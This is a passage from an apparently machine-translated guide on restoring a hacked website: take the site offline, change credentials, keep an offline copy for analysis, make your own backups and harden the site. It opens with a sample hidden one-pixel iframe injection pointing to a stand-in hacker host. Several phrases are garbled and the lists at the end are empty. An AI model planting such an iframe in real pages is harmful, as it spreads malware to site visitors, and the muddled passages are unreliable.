iframe src="http://www.example-hacker-site.com/inject/some-parameters" width="1" height="1" frameborder="0"
content of malicious code
{/ xtypo_code}
Security experts recommend that administrators remove the entire website to avoid becoming the focus of spreading malicious code. And during the entire recovery process, continue to keep the offline status of the website.
At first glance it seems simple, many administrators seem to be not paying attention to this extremely important step. After being peeked at by hackers, you should renew all passwords including ftp, ssh accounts, admin accounts, databases .
To determine which causes and weaknesses have been exploited by hackers, you need to keep a copy of the original status at the time of the attack. This is very useful for analyzing and preventing future threats, you should save the website as a compressed file in rar, zip or gzip format and store in a safe place. Note that this quarantine file should never be saved directly on the server.
Do not rely too much on host providers that will back up all your data. A lot of tech support regularly asserts that they have scheduled automatic backups, but nothing can be as certain as what you do on your own, moreover, two backup options are always better. 1 option
This process should be thoughtful to ensure that the entire website is safe and error free, then you can post it again as before.
To ensure that the attacks will never be repeated, administrators should conduct a complete, detailed analysis and analysis of the attack. Where is the error? Security vulnerabilities or web applications? Or due to the decentralized decentralized mode, confused? Can the website be infected directly from the server hosting the data? All must be thoroughly researched and analyzed. If necessary, ask security experts from leading security companies such as Kaspersky, BitDefender, Norton, Panda, Avira .
Although you have successfully restored the website, there is no guarantee that your website will not be attacked again. If the old security vulnerability has not been overcome, it is possible that your website will be paralyzed tonight. Based on the analysis results obtained in the previous step, you should apply appropriate security measures, upgrade the server, install additional security programs, upgrade the entire web application or use the rules Completely new privacy laws.
Based on management experience and information gathered, we can contribute some more advice and objective predictions about the causes as follows.
Easy causes:
Some simple but useful operations: